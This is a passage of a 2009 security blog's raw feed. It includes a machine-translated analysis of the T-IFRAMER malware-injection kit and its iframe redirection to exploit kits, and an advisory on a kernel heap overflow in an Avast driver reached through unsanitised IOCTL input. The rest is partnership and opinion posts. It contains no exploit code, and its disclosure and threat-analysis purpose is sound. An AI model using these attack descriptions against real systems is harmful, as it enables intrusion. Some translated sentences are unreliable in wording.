a una nueva url desde la cual una batería de exploit intentan alcanzar con su artillería a los equipos potencialmente vulnerables, y descargar el malware encargado de reclutar la zombi."&gt;That is, the domain "hidden" between the labels iframe redirects to a new URL from which to exploit a battery of artillery trying to achieve with its potentially vulnerable computers, and download the malware responsible for recruiting the zombie.&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_Ppq0fEGkHo4/SwBwN4i_WZI/AAAAAAAAB8o/JtMlaccVM3c/s1600-h/mipistus-tiframer-fragus.png#googtrans%28es%7Cen%29"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 301px;" src="http://1.bp.blogspot.com/_Ppq0fEGkHo4/SwBwN4i_WZI/AAAAAAAAB8o/JtMlaccVM3c/s400/mipistus-tiframer-fragus.png" alt="" id="BLOGGER_PHOTO_ID_5404442936664349074" border="0" /&gt;&lt;/a&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="display: inline;" title="T-IFRAMER  posee dos grupos bien diferenciados. Por un lado el de administración y por el otro el de ataque; además de, evidentemente seguir alimentando la botnet; con lo cual está bien claro que quienes se encuentran detrás de este tipo de crimeware saben realmente lo que buscan y, aunque el desarrollo de la aplicación sea muy sencillo, es lo suficientemente efectivo como para ser utilizada por una des botnets más efectivas de la actualidad como lo es fragus."&gt;T-IFRAMER&lt;/span&gt;&lt;/span&gt;&lt;span style="display: inline;" title="T-IFRAMER  posee dos grupos bien diferenciados. Por un lado el de administración y por el otro el de ataque; además de, evidentemente seguir alimentando la botnet; con lo cual está bien claro que quienes se encuentran detrás de este tipo de crimeware saben realmente lo que buscan y, aunque el desarrollo de la aplicación sea muy sencillo, es lo suficientemente efectivo como para ser utilizada por una des botnets más efectivas de la actualidad como lo es fragus."&gt; has two distinct groups. On one hand the administration and on the other the attack in addition to obviously continue to fuel the &lt;span style="font-weight: bold;"&gt;botnet&lt;/span&gt;, with which it's clear that those behind this type of &lt;span style="font-weight: bold;"&gt;crimeware&lt;/span&gt; really know what they want and, although the development of the application is very simple, is effective enough to be used by a des botnets more effective today as it's fragus.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="display: inline;" title="Por último, estas acciones son muy similares a las realizadas por  Gumblar  (que según algunas fuentes sería de origen chino, aunque lo dudo); y si bien no puedo asegurar que en este caso se trate de los mecanismos que permiten diseminar Gumblar, sobre todo porque en primera instancia este Kit es de origen ruso (al igual que fragus), no cabe dudas que la estrategia (en su conjunto) es muy similar  ¿será lo que hoy muchos llaman Gumblar?"&gt;Finally, these actions are very similar to those performed by &lt;/span&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="display: inline;" title="Por último, estas acciones son muy similares a las realizadas por  Gumblar  (que según algunas fuentes sería de origen chino, aunque lo dudo); y si bien no puedo asegurar que en este caso se trate de los mecanismos que permiten diseminar Gumblar, sobre todo porque en primera instancia este Kit es de origen ruso (al igual que fragus), no cabe dudas que la estrategia (en su conjunto) es muy similar  ¿será lo que hoy muchos llaman Gumblar?"&gt;Gumblar&lt;/span&gt;&lt;/span&gt;&lt;span style="display: inline;" title="Por último, estas acciones son muy similares a las realizadas por  Gumblar  (que según algunas fuentes sería de origen chino, aunque lo dudo); y si bien no puedo asegurar que en este caso se trate de los mecanismos que permiten diseminar Gumblar, sobre todo porque en primera instancia este Kit es de origen ruso (al igual que fragus), no cabe dudas que la estrategia (en su conjunto) es muy similar  ¿será lo que hoy muchos llaman Gumblar?"&gt; (who according to some sources would be of Chinese origin, though I doubt it), and although I can not say that in this case concerned the mechanisms for disseminating Gumblar, especially because in the first instance this kit is of Russian origin (as fragus), there is no doubt that the strategy (together) is very similar. &lt;span style="font-style: italic;"&gt;&lt;br /&gt;&lt;br /&gt;I&lt;/span&gt;&lt;/span&gt;&lt;span style="font-style: italic;"&gt;&lt;span style="display: inline;" title="Por último, estas acciones son muy similares a las realizadas por  Gumblar  (que según algunas fuentes sería de origen chino, aunque lo dudo); y si bien no puedo asegurar que en este caso se trate de los mecanismos que permiten diseminar Gumblar, sobre todo porque en primera instancia este Kit es de origen ruso (al igual que fragus), no cabe dudas que la estrategia (en su conjunto) es muy similar  ¿será lo que hoy muchos llaman Gumblar?"&gt;s it what many call today Gumble?&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="display: inline;" title="Información relacionada"&gt;Related information&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/08/fragus-nueva-botnet-framework-in-wild.html#googtrans%28es%7Cen%29"&gt;&lt;span style="display: inline;" title="Fragus. Nueva botnet framework In-the-Wild"&gt;Fragus. New botnet framework In-the-Wild&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/11/zopack-nueva-alternativa-para-la.html#googtrans%28es%7Cen%29"&gt;&lt;span style="display: inline;" title="ZoPAck. Nueva alternativa para la explotación de v..."&gt;ZoPAck. New alternative for the exploitation of v. ..&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/10/zeus-botnet-y-su-poder-de-reclutamiento.html#googtrans%28es%7Cen%29"&gt;&lt;span style="display: inline;" title="ZeuS Botnet y su poder de reclutamiento zombi"&gt;ZeuS and power Botnet zombie recruitment&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/10/ddbot-mas-gestion-de-botnets-via-web.html#googtrans%28es%7Cen%29"&gt;&lt;span style="display: inline;" title="DDBot. Más gestión de botnets vía web"&gt;DDBot. More Botnets management via web&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/09/phoenix-exploits-kit-otra-alternativa.html#googtrans%28es%7Cen%29"&gt;&lt;span style="display: inline;" title="Phoenix Exploit’s Kit. Otra alternativa para el control de botnets"&gt;Phoenix Exploit's Kit Another alternative for controlling botnets&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/09/infloader-control-de-botnets-marihuana.html#googtrans%28es%7Cen%29"&gt;&lt;span style="display: inline;" title="iNF`[LOADER]. Control de botnets, (...) y propagación de malware"&gt;INF `[LOADER]. Control of botnets, malware and spread (...)&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/08/liberty-exploit-system-otra-alternativa.html#googtrans%28es%7Cen%29"&gt;&lt;span style="display: inline;" title="Liberty Exploit System. Otra alternativa (...) para el control de botnets"&gt;Liberty Exploit System. (...) Another alternative for controlling botnets&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/08/eleonore-exploits-pack-nueva-crimeware.html#googtrans%28es%7Cen%29"&gt;&lt;span style="display: inline;" title="Eleonore Exploits Pack. Nuevo crimeware In-the-Wild"&gt;Eleonore Exploits Pack. New Crimeware In-the-Wild&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/08/los-precios-del-crimeware-ruso-parte-2.html#googtrans%28es%7Cen%29"&gt;&lt;span style="display: inline;" title="Los precios del crimeware ruso. Parte 2"&gt;Russian crimeware prices. Part 2&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="display: inline;" title="Jorge Mieres  Ver más"&gt;Jorge Mieres&lt;br /&gt;Pistus Malware Intelligence Blog&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6766263746795718144-5008722736625809194?l=evilfingers.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilfingers.blogspot.com/feeds/5008722736625809194/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6766263746795718144&amp;postID=5008722736625809194' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/5008722736625809194'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/5008722736625809194'/><link rel='alternate' type='text/html' href='http://evilfingers.blogspot.com/2009/11/t-iframer-kit-for-injection-of-malware.html' title='T-IFRAMER. Kit for the injection of malware In-the-Wild'/><author><name>Jorge Mieres</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_Ppq0fEGkHo4/SwBr95WebMI/AAAAAAAAB7o/rOygOyEJQhI/s72-c/mipistus-tiframer-auth.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6766263746795718144.post-1997430662893161496</id><published>2009-11-15T16:09:00.003-11:00</published><updated>2009-11-15T16:16:39.585-11:00</updated><title type='text'>CCCure Group of Sites and EvilFingers Group of Sites - Technology Partners</title><content type='html'>We are glad to announce that CCCURE group of websites and EvilFingers group of websites are official technology partners.&lt;br /&gt;&lt;br /&gt;Snapshot of CCCure.org:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_gJDtaXmerr4/SwDDP4M3sWI/AAAAAAAAAYc/PVjBCHpPxNM/s1600/cissp+CISSP+training+Certified+Information+Systems+Security+Professional_1258341159087.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 188px;" src="http://1.bp.blogspot.com/_gJDtaXmerr4/SwDDP4M3sWI/AAAAAAAAAYc/PVjBCHpPxNM/s400/cissp+CISSP+training+Certified+Information+Systems+Security+Professional_1258341159087.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5404534230396416354" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;CCCure[pronounced as "Sea Secure"] is one of the largest training providers for various certifications. They do training &amp; services. They are also one of the largest free testing website for CISSP and certain other certs.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_gJDtaXmerr4/SwDDQGWpNHI/AAAAAAAAAYk/IsQUZ4GV8TY/s1600/CCCURE_1.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 151px;" src="http://4.bp.blogspot.com/_gJDtaXmerr4/SwDDQGWpNHI/AAAAAAAAAYk/IsQUZ4GV8TY/s400/CCCURE_1.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5404534234195506290" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Check it out at your convenience. Thanks to CCCure for extending their technology relations with EvilFingers group of sites.&lt;br /&gt;&lt;br /&gt;Thank you for choosing our blog.&lt;br /&gt;EF&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6766263746795718144-1997430662893161496?l=evilfingers.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilfingers.blogspot.com/feeds/1997430662893161496/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6766263746795718144&amp;postID=1997430662893161496' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/1997430662893161496'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/1997430662893161496'/><link rel='alternate' type='text/html' href='http://evilfingers.blogspot.com/2009/11/cccure-group-of-sites-and-evilfingers.html' title='CCCure Group of Sites and EvilFingers Group of Sites - Technology Partners'/><author><name>Anushree</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_gJDtaXmerr4/SwDDP4M3sWI/AAAAAAAAAYc/PVjBCHpPxNM/s72-c/cissp+CISSP+training+Certified+Information+Systems+Security+Professional_1258341159087.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6766263746795718144.post-7245785229413754720</id><published>2009-11-15T15:49:00.004-11:00</published><updated>2009-11-15T15:58:12.526-11:00</updated><title type='text'>ZeusTracker Project &amp; EvilFingers Group of Sites - Technology Partners</title><content type='html'>We are glad to announce the official technology partnership of ZeusTracker Project &amp; EvilFingers Group of Sites. We have been researching in the same domain for a while and have shared data in the past through Malware Domains List. Since this was not officially declared until now, we thought that this is the right time to declare a Technology partnership. &lt;br /&gt;&lt;br /&gt;Check this out: &lt;a href="https://zeustracker.abuse.ch/"&gt;[ZeusTracker Project Site]&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_gJDtaXmerr4/SwC_rjlxXVI/AAAAAAAAAYU/l4gccjhpGKc/s1600/abuse.ch+ZeuS+Tracker+::+Home_1258339602347.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 252px;" src="http://2.bp.blogspot.com/_gJDtaXmerr4/SwC_rjlxXVI/AAAAAAAAAYU/l4gccjhpGKc/s400/abuse.ch+ZeuS+Tracker+::+Home_1258339602347.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5404530307853540690" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;ZeusTracker project does the job of collecting and researching Zeus Botnet data, one of the largest Botnets in the history of mankind. ZeusTracker has done a great job in keeping their data up to date. It is quite hard to maintain records for fast-flux botnets, as they keep changing very frequently[highly volatile].&lt;br /&gt;&lt;br /&gt;Thank you for choosing our blog.&lt;br /&gt;EF&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6766263746795718144-7245785229413754720?l=evilfingers.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilfingers.blogspot.com/feeds/7245785229413754720/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6766263746795718144&amp;postID=7245785229413754720' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/7245785229413754720'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/7245785229413754720'/><link rel='alternate' type='text/html' href='http://evilfingers.blogspot.com/2009/11/zeustracker-project-evilfingers-group.html' title='ZeusTracker Project &amp; EvilFingers Group of Sites - Technology Partners'/><author><name>Anushree</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_gJDtaXmerr4/SwC_rjlxXVI/AAAAAAAAAYU/l4gccjhpGKc/s72-c/abuse.ch+ZeuS+Tracker+::+Home_1258339602347.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6766263746795718144.post-9070813699154987435</id><published>2009-11-15T14:58:00.007-11:00</published><updated>2009-11-15T15:12:59.648-11:00</updated><title type='text'>Do movie producers make their cut?</title><content type='html'>There are many English and Foreign language sites that link to videos loaded into Google Videos, You Tube, Yahoo Videos and other places for accessing copy protected videos ripped from DVD or video print from movie theaters. Some of them include:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_gJDtaXmerr4/SwCzGOu-ryI/AAAAAAAAAX0/o0dBiu-NSm4/s1600/TamilTubeVid.Com:+Watch+Online+Tamil+Movies_1258336628147.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 150px;" src="http://1.bp.blogspot.com/_gJDtaXmerr4/SwCzGOu-ryI/AAAAAAAAAX0/o0dBiu-NSm4/s320/TamilTubeVid.Com:+Watch+Online+Tamil+Movies_1258336628147.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5404516472460324642" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_gJDtaXmerr4/SwCzGrfkYfI/AAAAAAAAAYE/Mybj4imXA40/s1600/Project+Free+TV+-+Watch+all+your+favorite+tv+shows+and+movies+online+free_1258336820961.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 194px;" src="http://1.bp.blogspot.com/_gJDtaXmerr4/SwCzGrfkYfI/AAAAAAAAAYE/Mybj4imXA40/s320/Project+Free+TV+-+Watch+all+your+favorite+tv+shows+and+movies+online+free_1258336820961.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5404516480180314610" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_gJDtaXmerr4/SwCzGWhcwnI/AAAAAAAAAX8/c1pAHTMwTyo/s1600/Movie+Khoj.Com+%7C+Watch+Movies+Legally+-+For+Free+!!+-+Online+Indian+Movies+-+Bollywood,+Hindi,+English,+Telugu,+Tamil+-+Download_1258335942403.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 150px;" src="http://4.bp.blogspot.com/_gJDtaXmerr4/SwCzGWhcwnI/AAAAAAAAAX8/c1pAHTMwTyo/s320/Movie+Khoj.Com+%7C+Watch+Movies+Legally+-+For+Free+!!+-+Online+Indian+Movies+-+Bollywood,+Hindi,+English,+Telugu,+Tamil+-+Download_1258335942403.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5404516474551059058" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Do DVD protection software's really protect the movies from being ripped? Does RIAA really do its job in protecting such music and movies from being downloaded? Despite all such measures why do this still happen and how much loss do the movie makers face because of such illegal activities?&lt;br /&gt;&lt;br /&gt;Well, the answer is too long &amp; this blog was intended to put you to think. If you want to really watch a movie, buy the DVD or go to a theater. Don't support such illegal acts by even viewing these videos online. This would not stop the bad guys, but it would at the least discourage them from uploading illegal copies of the movies.&lt;br /&gt;&lt;br /&gt;DRM Analytics coming soon[not too soon], with Digital Rights Management solutions to entertainment &amp; gaming industry. Stay put!&lt;br /&gt;&lt;br /&gt;Thank you for choosing our blog.&lt;br /&gt;EF&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6766263746795718144-9070813699154987435?l=evilfingers.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilfingers.blogspot.com/feeds/9070813699154987435/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6766263746795718144&amp;postID=9070813699154987435' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/9070813699154987435'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/9070813699154987435'/><link rel='alternate' type='text/html' href='http://evilfingers.blogspot.com/2009/11/do-movie-producers-make-their-money-in.html' title='Do movie producers make their cut?'/><author><name>Anushree</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_gJDtaXmerr4/SwCzGOu-ryI/AAAAAAAAAX0/o0dBiu-NSm4/s72-c/TamilTubeVid.Com:+Watch+Online+Tamil+Movies_1258336628147.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6766263746795718144.post-347369605372586615</id><published>2009-11-15T13:02:00.003-11:00</published><updated>2009-11-15T14:24:19.461-11:00</updated><title type='text'>Eve Online: How do big MMO's secure themselves?</title><content type='html'>Eve Online is a cluster based MMO created primarily with Python.&lt;br /&gt;&lt;br /&gt;The following &lt;a href="http://www.python.org/about/quotes"&gt;statement&lt;/a&gt; is by &lt;a href="http://www.linkedin.com/in/hilmarveigar"&gt;Hilmar Veigar Petursson&lt;/a&gt; Chief Executive Officer of CCP games, on &lt;a href="http://www.python.org"&gt;Python.org&lt;/a&gt;:&lt;br /&gt;&lt;br /&gt;"Python enabled us to create EVE Online, a massive multiplayer game, in record time. The EVE Online server cluster runs over 50,000 simultaneous players in a shared space simulation, most of which is created in Python. The flexibilities of Python have enabled us to quickly improve the game experience based on player feedback" said Hilmar Veigar Petursson of CCP Games.&lt;br /&gt;&lt;br /&gt;The following is a snapshot of the game:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_RCzcDbPwCA0/SwCkmt9yvfI/AAAAAAAAAAs/Yt9Jx4Sf0Hg/s1600-h/EVE+Online+-+a+massive+multiplayer+online+roleplaying+space+game+-+MMORPG_1258329646688.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 188px;" src="http://3.bp.blogspot.com/_RCzcDbPwCA0/SwCkmt9yvfI/AAAAAAAAAAs/Yt9Jx4Sf0Hg/s400/EVE+Online+-+a+massive+multiplayer+online+roleplaying+space+game+-+MMORPG_1258329646688.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5404500537925352946" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;We just added another snapshot because we thought that it looked nice :)&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_RCzcDbPwCA0/SwCkl6WJwbI/AAAAAAAAAAk/vcG9nUFOu-g/s1600-h/EVE+Online+-+a+massive+multiplayer+online+roleplaying+space+game+-+MMORPG_1258329584712.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 188px;" src="http://3.bp.blogspot.com/_RCzcDbPwCA0/SwCkl6WJwbI/AAAAAAAAAAk/vcG9nUFOu-g/s400/EVE+Online+-+a+massive+multiplayer+online+roleplaying+space+game+-+MMORPG_1258329584712.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5404500524068880818" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Python is known for its stability. Google utilizes Python for almost everything. That being the reason, the creator of Python is an employee @ Google.&lt;br /&gt;&lt;br /&gt;What does it take to secure such MMO apps?&lt;br /&gt;&lt;br /&gt;The main answer lies in the engines on which they are running. Python is known for its stability and highly structured with support to easy access/usage. Using Python does not mean that the software is secure, but that is just the first step towards "avoiding unstable development environment". The next thing is to ensure authenticity &amp; authorization using access control techniques, integrity by using critificates, etc. But most of all MMO's main concern is to:&lt;br /&gt;&lt;br /&gt;* Ensure that their model keeps changing, to avoid from someone cracking the software by applying Digital Rights Management solutions.&lt;br /&gt;* Ensure that only authorized users get to access their tools.&lt;br /&gt;* Prevent misuse by authorized users.&lt;br /&gt;* Web application security - Prevent web based attacks.&lt;br /&gt;* Load balance requests and have DoS/DDoS avoidances.&lt;br /&gt;&lt;br /&gt;There are other things that MMO's do, to secure their apps. But these are the primary things I could think of. Beyond all this, Eve has done an awesome job and is the most popular MMO. Bravo Eve!&lt;br /&gt;&lt;br /&gt;EF&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6766263746795718144-347369605372586615?l=evilfingers.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilfingers.blogspot.com/feeds/347369605372586615/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6766263746795718144&amp;postID=347369605372586615' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/347369605372586615'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/347369605372586615'/><link rel='alternate' type='text/html' href='http://evilfingers.blogspot.com/2009/11/eve-online-how-do-big-mmos-secure.html' title='Eve Online: How do big MMO&apos;s secure themselves?'/><author><name>Anushree</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_RCzcDbPwCA0/SwCkmt9yvfI/AAAAAAAAAAs/Yt9Jx4Sf0Hg/s72-c/EVE+Online+-+a+massive+multiplayer+online+roleplaying+space+game+-+MMORPG_1258329646688.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6766263746795718144.post-9215363264321065351</id><published>2009-11-13T20:29:00.006-11:00</published><updated>2009-11-14T04:24:34.049-11:00</updated><title type='text'>Avast aswRdr.sys Kernel Pool Corruption and Local Privilege Escalation</title><content type='html'>&lt;blockquote&gt;---------------------------------------------------&lt;br /&gt;Advisory: Avast aswRdr.sys Kernel Pool Corruption and Local Privilege Escalation.&lt;br /&gt;&lt;br /&gt;Version Affected: Product: Avast antivirus 4.8.1356.0 (other versions could be affected)&lt;br /&gt;Vulnerable Compoonent: aswRdr.sys 4.8.1356.0 (avast! TDI RDR Driver)&lt;br /&gt;Category: Local Denial of Service due to kernel memory corruption (BSOD)&lt;br /&gt;     (untested) Local Privilege Escalation&lt;br /&gt;&lt;br /&gt;PoC Code: porting C++ 26/09/2009 Vendor Notify: 26/09/2009&lt;br /&gt;Vendor Reply: 15/09/2009 Vendor Fix: 15/10/2009&lt;br /&gt;&lt;br /&gt;Vulnerability Details:&lt;br /&gt;Avast's aswRdr.sys Driver does not sanitize user supplied input IOCTL and this lead to Kernel Heap Overflow that propagates on the system with a BSOD and potential risk of Privilege Escalation.&lt;br /&gt;&lt;br /&gt;Credit:&lt;br /&gt;Giuseppe 'Evilcry' Bonfa' (Project Manager, www.EvilFingers.com)&lt;br /&gt;E-Mail: evilcry {AT} GMAIL {DOT} COM&lt;br /&gt;Additional credit: AbdulAziz Hariri from http://www.insight-tech.org&lt;br /&gt;Website: http://evilcry.netsons.org, http://evilcodecave.blogspot.com&lt;br /&gt;http://evilcodecave.wordpress.com&lt;br /&gt;&lt;br /&gt;Disclaimer:&lt;br /&gt;The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There is no representation or warranties, either express or implied by or with respect to anything in this document, and shall not be liable for a ny implied warranties of merchantability or fitness for a particular purpose or for any indirect special or consequential damages.&lt;br /&gt;---------------------------------------------------&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;FOR MORE INFO &lt;a href="https://www.evilfingers.com/advisory/Advisory/Avast_aswRdr_sys_Kernel_Pool_Corruption_and_Local_Privilege_Escalation.php"&gt;CLICK HERE&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;- EF&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6766263746795718144-9215363264321065351?l=evilfingers.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilfingers.blogspot.com/feeds/9215363264321065351/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6766263746795718144&amp;postID=9215363264321065351' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/9215363264321065351'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/9215363264321065351'/><link rel='alternate' type='text/html' href='http://evilfingers.blogspot.com/2009/11/avast-aswrdrsys-kernel-pool-corruption.html' title='Avast aswRdr.sys Kernel Pool Corruption and Local Privilege Escalation'/><author><name>Anushree</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6766263746795718144.post-4531263799856919122</id><published>2009-11-13T16:27:00.002-11:00</published><updated>2009-11-13T17:04:02.045-11:00</updated><title type='text'>Compendio mensual de información. Octubre 2009</title><content type='html'>&lt;span style="font-weight:bold;"&gt;Pistus Malware Intelligence Blog&lt;/span&gt;&lt;br /&gt;27.10.09 &lt;a href="http://mipistus.blogspot.com/2009/10/una-recorrida-por-los-ultimos-scareware_27.html"&gt;Una recorrida por los últimos scareware XVII&lt;/a&gt;&lt;br /&gt;24.10.09 &lt;a 